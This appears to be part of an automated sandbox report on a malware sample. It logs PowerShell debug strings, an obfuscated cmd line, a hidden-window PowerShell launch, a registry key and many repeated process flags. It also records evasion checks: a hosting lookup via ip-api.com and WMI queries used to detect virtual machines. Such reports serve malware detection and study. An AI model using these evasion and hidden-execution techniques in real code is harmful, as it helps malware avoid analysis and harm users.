Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbU source: powershell.exe, 00000008.00000002.1737175826.000001D039B20000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 00000008.00000002.1737175826.000001D039B20000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb001000100b5fc90e7027f67871e773a8fde8938c81dd402ba65b9201d60593e96c492651e889cc13f1415ebb53fac1131ae0bd333c5ee6021672d9718ea31a8aebd0da0072f25d87dba6fc90ffd598ed4da35e44c398c454307e8e33b8426143daec9f596836f97c8f74750e5975c64e2189f source: powershell.exe, 00000008.00000002.1737175826.000001D039B20000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: powershell.exe, 00000008.00000002.1737175826.000001D039B20000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbg source: powershell.exe, 00000008.00000002.1737175826.000001D039B20000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.Powershell.PSReadline.pdb000100b5fc90e7027f67871e773a8fde8938c81dd402ba65b9201d60593e96c492651e889cc13f1415ebb53fac1131ae0bd333c5ee6021672d9718ea31a8aebd0da0072f25d87dba6fc90ffd598ed4da35e44c398c454307e8e33b8426143daec9f596836f97c8f74750e5975c64e2189f source: powershell.exe, 00000008.00000002.1737175826.000001D039B20000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 00000008.00000002.1736352605.000001D03983A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbE source: powershell.exe, 00000008.00000002.1737175826.000001D039B20000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Core.pdbpdbore.pdb source: powershell.exe, 00000008.00000002.1737175826.000001D039B20000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

barindex
Obfuscated command line found
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c \"set __=^&rem\
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c \"set __=^&rem\
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c \"set __=^&rem\Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c \"set __=^&rem\Jump to behavior
Suspicious powershell command line found
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hiddenJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD9B884C45 push eax; iretd 8_2_00007FFD9B884C59
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD9B89095D push esp; retf 8_2_00007FFD9B89095E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD9B887938 push ebx; retf 8_2_00007FFD9B88796A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD9B89595C push ds; retf 8_2_00007FFD9B89596F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD9B88785E push eax; iretd 8_2_00007FFD9B88786D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD9B88776A pushad ; iretd 8_2_00007FFD9B88785D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\29D56E68178AFEF853F0 B93374FDFD9AF786FF20597AE0E242B81373984BA5718194F9E57FEB231C52CFJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Check if machine is in data center or colocation facility
Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
